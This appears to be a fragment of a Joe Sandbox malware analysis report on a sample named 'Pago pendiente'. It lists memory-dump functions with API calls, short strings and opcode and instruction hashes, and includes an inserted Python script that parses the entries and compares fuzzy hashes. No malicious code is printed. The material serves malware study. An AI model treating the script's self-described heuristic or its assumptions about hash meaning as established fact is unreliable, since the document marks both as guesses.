                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031AB37E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A42D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq
                                                          • API String ID: 0-348098666
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: O};5
                                                          • API String ID: 0-3558557551
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: O};5
                                                          • API String ID: 0-3558557551
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3H5
                                                          • API String ID: 0-3899204960
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3H5
                                                          • API String ID: 0-3899204960
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq
                                                          • API String ID: 0-348098666
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4180576bcb25a0c267a3c7edfb00ccaf680ed40c93ebe20b5155d838ce94d345
                                                          • Instruction ID: c12c3e7e7a1bbef220deac0388957a494a80d58c05ff0e6b8e600893e973f97e
                                                          • Opcode Fuzzy Hash: 4180576bcb25a0c267a3c7edfb00ccaf680ed40c93ebe20b5155d838ce94d345
                                                          • Instruction Fuzzy Hash: 3931A4B0E205268BC7448FBAD84827AB7B2FB46250F14866AE5B5D2380E378D552D7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b57e7fe6d5267ab12744ebb7b9fb3192115eef25b58e7dbfbc186ec19e998327
                                                          • Instruction ID: bbd116ce6e9142fade41cab03e663224b4bbb0a3651da028a8636d8b6cc86a03
                                                          • Opcode Fuzzy Hash: b57e7fe6d5267ab12744ebb7b9fb3192115eef25b58e7dbfbc186ec19e998327
                                                          • Instruction Fuzzy Hash: A031C2B0B49261CFD3118F24981DB757B62AB82B49F5984BAF0658F2C3CAB58806DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce0a2b9d97577002a0661f686cfa31d44d5ea01c49d8d2576c4d2c85b29bdc1a
                                                          • Instruction ID: 4281ca25e8692c6bed5f5ffe6cd67a0fe87f4983f21a4e88ebebdc75ac10bb19
                                                          • Opcode Fuzzy Hash: ce0a2b9d97577002a0661f686cfa31d44d5ea01c49d8d2576c4d2c85b29bdc1a
                                                          • Instruction Fuzzy Hash: 5921B4F5B104298BDB00CF94C8427BABBB1FB45741F108956E961DB285D63DD902DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d238219aff8d65829496b889cc0c268312ce179dfa27d1df7d2089c0a903c549
                                                          • Instruction ID: f3270908eed455fe8adc2c4779e32feb9ba9abbbe3bb037cb175162c3e86f345
                                                          • Opcode Fuzzy Hash: d238219aff8d65829496b889cc0c268312ce179dfa27d1df7d2089c0a903c549
                                                          • Instruction Fuzzy Hash: 8D3106B1A19272CBD7004B68C81477DB7A2EB42354F5889B7D4798F183CB3D8683E711
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1439f7d5b92ede3a955daf8f054b763de637a9d16cacda660cb78deccc0ddca3
                                                          • Instruction ID: 1275e92e99456409302147a07fa255f2eded40cb12a79c7233c79f973413fe02
                                                          • Opcode Fuzzy Hash: 1439f7d5b92ede3a955daf8f054b763de637a9d16cacda660cb78deccc0ddca3
                                                          • Instruction Fuzzy Hash: 71214971504204DFCB06DF98D5C4B16BB65FB84318F24C66DDB098B346C33AD946CA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e67a2d37ca187c21bd1fde5090f5a64d6f89a1bc28630470aecd201d14ea8959
                                                          • Instruction ID: 0c87fe6ced0ce2138047b8d1aff01e729e9a2662df8c313c19f1f1112da3bc9c
                                                          • Opcode Fuzzy Hash: e67a2d37ca187c21bd1fde5090f5a64d6f89a1bc28630470aecd201d14ea8959
                                                          • Instruction Fuzzy Hash: 8C212979504304DFDB06DF98C5C0B26BB65FB84328F24C66DEB098B346C33AE546CAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80f3134b9930e3fd2678a59dce59094c8ae7e6977604bcad9ec2f11f144ce530
                                                          • Instruction ID: d10c33e877b732b60123326e1e23964108742f5c0e7aae01b8e9bb72d1aaa777
                                                          • Opcode Fuzzy Hash: 80f3134b9930e3fd2678a59dce59094c8ae7e6977604bcad9ec2f11f144ce530
                                                          • Instruction Fuzzy Hash: 193112B4D10258DFDB20CF9AC984BCEBFF4AB48354F24841AE414BB250D7755846CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4e4dbfc2146a170ed249a7f341939c7100c74cd484a910e5de37f75268d0ae2
                                                          • Instruction ID: c061d2bda68d4fb9a379975c1d43658d87f19fa8f34e9e8f399be3edba4d14b6
                                                          • Opcode Fuzzy Hash: b4e4dbfc2146a170ed249a7f341939c7100c74cd484a910e5de37f75268d0ae2
                                                          • Instruction Fuzzy Hash: 7A31F2B0D11218DFDB20CF9AC584B8EBFF4EB48314F24841AE514BB250D7B55945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df8f4255f5eae79a0ae4b0f5574b2799f2e5b2110e2a40c4427c79e85057895
                                                          • Instruction ID: 5e386325b094f3489e274adc2f726a8a9e937febbe032a3ad133b6f759f6d097
                                                          • Opcode Fuzzy Hash: 7df8f4255f5eae79a0ae4b0f5574b2799f2e5b2110e2a40c4427c79e85057895
                                                          • Instruction Fuzzy Hash: 1C1127F1A28635CBD7288E69DC813BEB7A5F782364F14853AE476C7290C638D942D260
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe22ebe3853dfb1ae36014f24b3950ba874105420d1d22dfdbd2f940a5094dc
                                                          • Instruction ID: 0d537a571f77d661120cec5f91f47fda3d4903b9de3c9da85447b43a3385b756
                                                          • Opcode Fuzzy Hash: cfe22ebe3853dfb1ae36014f24b3950ba874105420d1d22dfdbd2f940a5094dc
                                                          • Instruction Fuzzy Hash: 2221AFB4A20918DFD748DF5AE085999BFF1FF88314F5280D5E8889B325DB31E9A1CB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9aa6210ad8b50668d5057957d1d90072652bc3af088f86f85a336f8d75a05cff
                                                          • Instruction ID: 09f8ca45dc9be5d45678331733dc6652f0fb7b4eee6f554c63fc56849754c7c6
                                                          • Opcode Fuzzy Hash: 9aa6210ad8b50668d5057957d1d90072652bc3af088f86f85a336f8d75a05cff
                                                          • Instruction Fuzzy Hash: E12114B68003499FCB20CF9AC884ADEBFF4FB58310F50841AE919A7210C374A945DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction ID: e7dbf48e8be6084f8c7de3cf5ba33c846d49a861a7d871a447d7ad70167c6daf
                                                          • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction Fuzzy Hash: 7311DD7A504280CFDB02CF54C5C4B15BFA1FB84324F24C6AEDA498B256C33AE50ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction ID: 3e3f5fe4c3fb10bab5a9d273f299b8157188af22cafb73d03006109d3b543b25
                                                          • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                          • Instruction Fuzzy Hash: 6411BB76504280CFDB02CF58D5C4B15BBA1FB84318F24C6ADDA098B656C33AE54ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
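The two 018FD000 entries directly above share one Opcode ID (c74efafe…) but carry different Instruction IDs and instruction fuzzy hashes. With every function in this listing reported at a Uniqueness Score of -1.00%, repeats like this are easiest to find by parsing the entries yourself. The script below is an added example and not Joe Sandbox tooling: it parses "Memory Dump Source" entries, buckets them by dump offset, and reports Opcode IDs seen with more than one Instruction ID. Two assumptions are labelled in the code: that Opcode ID hashes only the opcode sequence while Instruction ID also covers operands (so one Opcode ID with several Instruction IDs reads as "same code shape, different operands"), and that the nibble-wise Hamming comparison of instruction fuzzy hashes is a crude heuristic of this example, not Joe Sandbox's own similarity metric. The sample input is copied from this report, with the empty API/String ID lines dropped from the second and third entries.

```python
"""Added example (not Joe Sandbox code): parse "Memory Dump Source" entries, group
them by region and flag repeated Opcode IDs.  Assumptions: Opcode ID is read as a
hash over the opcode sequence only and Instruction ID over opcodes plus operands;
the nibble-wise Hamming score is this example's heuristic, not Joe Sandbox's."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: three entries copied from the report above (two from the
# 018FD000 region that share an Opcode ID, one from the 07720000 region).
SAMPLE = """
Memory Dump Source
• Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
• Instruction ID: e7dbf48e8be6084f8c7de3cf5ba33c846d49a861a7d871a447d7ad70167c6daf
• Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
• Instruction Fuzzy Hash: 7311DD7A504280CFDB02CF54C5C4B15BFA1FB84324F24C6AEDA498B256C33AE50ACBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2007549778.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_18fd000_Pago pendiente.jbxd
• Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
• Instruction ID: 3e3f5fe4c3fb10bab5a9d273f299b8157188af22cafb73d03006109d3b543b25
• Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
• Instruction Fuzzy Hash: 6411BB76504280CFDB02CF58D5C4B15BBA1FB84318F24C6ADDA098B656C33AE54ACBA2
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
• Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
• Opcode ID: 740294529c13f37a064e5d8b4b233f77cb5e15e7568ae7174caa1ae85f0449e0
• Instruction ID: 8dee683523455163f0101b2a134c84c7aa1ce7cea284226b32264de64435c551
• Opcode Fuzzy Hash: 740294529c13f37a064e5d8b4b233f77cb5e15e7568ae7174caa1ae85f0449e0
• Instruction Fuzzy Hash: 4301F7F65047628BD722EA38C8505BF7B71EFC12E0B15055AD8B1C7252FA308906D361
Uniqueness Score: -1.00%
"""


@dataclass
class Entry:
    source_file: str
    offset: str
    snapshot: str
    opcode_id: str
    instruction_id: str
    instruction_fuzzy: str
    uniqueness: float | None


_RX = {
    "source": re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+)"),
    "snapshot": re.compile(r"Snapshot File:\s*(.+?)\s*$", re.M),
    "opcode": re.compile(r"Opcode ID:\s*([0-9a-f]+)"),
    "instr": re.compile(r"Instruction ID:\s*([0-9a-f]+)"),
    "ifuzzy": re.compile(r"Instruction Fuzzy Hash:\s*([0-9A-Fa-f]+)"),
    "score": re.compile(r"Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%"),
}


def parse_entries(text: str) -> list[Entry]:
    """Split at each 'Memory Dump Source' header and build one Entry per chunk.
    Chunks missing a required field (e.g. a truncated final entry) are skipped."""
    out: list[Entry] = []
    for chunk in re.split(r"^\s*Memory Dump Source\s*$", text, flags=re.M)[1:]:
        m = {k: rx.search(chunk) for k, rx in _RX.items()}
        if not all(m[k] for k in ("source", "snapshot", "opcode", "instr", "ifuzzy")):
            continue
        out.append(Entry(
            source_file=m["source"].group(1), offset=m["source"].group(2).upper(),
            snapshot=m["snapshot"].group(1), opcode_id=m["opcode"].group(1),
            instruction_id=m["instr"].group(1), instruction_fuzzy=m["ifuzzy"].group(1).upper(),
            uniqueness=float(m["score"].group(1)) if m["score"] else None))
    return out


def group_by_region(entries: list[Entry]) -> dict[str, list[Entry]]:
    """Bucket functions by the dump offset (memory region) they were lifted from."""
    regions: dict[str, list[Entry]] = defaultdict(list)
    for e in entries:
        regions[e.offset].append(e)
    return dict(regions)


def shared_opcode_ids(entries: list[Entry]) -> dict[str, list[str]]:
    """Opcode IDs seen with more than one distinct Instruction ID: under the
    assumption above, the same code shape instantiated with different operands."""
    seen: dict[str, set[str]] = defaultdict(set)
    for e in entries:
        seen[e.opcode_id].add(e.instruction_id)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def hex_hamming(a: str, b: str) -> int:
    """Count of differing hex nibbles between two equal-length hex strings."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length are not comparable this way")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def fuzzy_similarity(a: str, b: str) -> float:
    """1.0 for identical hashes, 0.0 when every nibble differs (heuristic only)."""
    return 1.0 - hex_hamming(a, b) / len(a)


if __name__ == "__main__":
    entries = parse_entries(SAMPLE)
    for offset, group in group_by_region(entries).items():
        print(f"region {offset}: {len(group)} function(s)")
    for opcode_id, instr_ids in shared_opcode_ids(entries).items():
        print(f"opcode {opcode_id[:16]}... seen with {len(instr_ids)} instruction IDs")
    a, b = entries[0].instruction_fuzzy, entries[1].instruction_fuzzy
    print(f"nibble similarity of the shared-opcode pair: {fuzzy_similarity(a, b):.2f}")
```

Run it against the whole report text rather than the embedded sample to see which of the 018ED000, 018FD000 and 07720000 regions carry repeated code shapes; a truncated trailing entry, like the one at the end of this section, is skipped rather than raising.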

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 740294529c13f37a064e5d8b4b233f77cb5e15e7568ae7174caa1ae85f0449e0
                                                          • Instruction ID: 8dee683523455163f0101b2a134c84c7aa1ce7cea284226b32264de64435c551
                                                          • Opcode Fuzzy Hash: 740294529c13f37a064e5d8b4b233f77cb5e15e7568ae7174caa1ae85f0449e0
                                                          • Instruction Fuzzy Hash: 4301F7F65047628BD722EA38C8505BF7B71EFC12E0B15055AD8B1C7252FA308906D361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007451309.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18ed000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34ac9ce438db7e3926b2cdf2a137063b1def3b0d8a38ba14b82fdcf9719c1c77
                                                          • Instruction ID: b40536dac17de002f9cc2de3ea5cce90d9633ca4a65bd6648710ae48f7b495e2
                                                          • Opcode Fuzzy Hash: 34ac9ce438db7e3926b2cdf2a137063b1def3b0d8a38ba14b82fdcf9719c1c77
                                                          • Instruction Fuzzy Hash: E9012B710443849AE7218F59CDC8B66BFD8DF43334F18C61AED098E287D2399948CA71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1b3743d9f8f09d4b749f86fcbd6c53f30e54eb2a158797ccf9bba228840f19b
                                                          • Instruction ID: 053e63838f556142bc55de8cff6cddd821b8a880a287c1cdfa2447615293b17f
                                                          • Opcode Fuzzy Hash: d1b3743d9f8f09d4b749f86fcbd6c53f30e54eb2a158797ccf9bba228840f19b
                                                          • Instruction Fuzzy Hash: 47015EF1C0026ACEEB14CFAAC4043ED7BB1BF05390F248629D464AA2A0E7744A46DFD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bddaab5fe6298599c0449b7cfa040f3ec98eadd9f6a13bf119a477d49244d24a
                                                          • Instruction ID: 15e5a9c4216f28450d1c38ea48b5462bf99025a829cbaeae4a6130f64a81a7d9
                                                          • Opcode Fuzzy Hash: bddaab5fe6298599c0449b7cfa040f3ec98eadd9f6a13bf119a477d49244d24a
                                                          • Instruction Fuzzy Hash: 11F024F2A00119AFCF06CB64DC458AE7FB9EF84260B1481A7E458D7221F23089519760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4808ce2124b78ac826715f5b02e9fb29f2d6b32fa4c4dc2e5570a11c0c9321b9
                                                          • Instruction ID: 7ba86273f231df16e7b9d93420c89427017c25f98b2b76859e215530013945f4
                                                          • Opcode Fuzzy Hash: 4808ce2124b78ac826715f5b02e9fb29f2d6b32fa4c4dc2e5570a11c0c9321b9
                                                          • Instruction Fuzzy Hash: B4F0E9F67001205F9304D66ED848D6BABE9FBC92603648079E50CC7310D9325C02D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007451309.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18ed000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
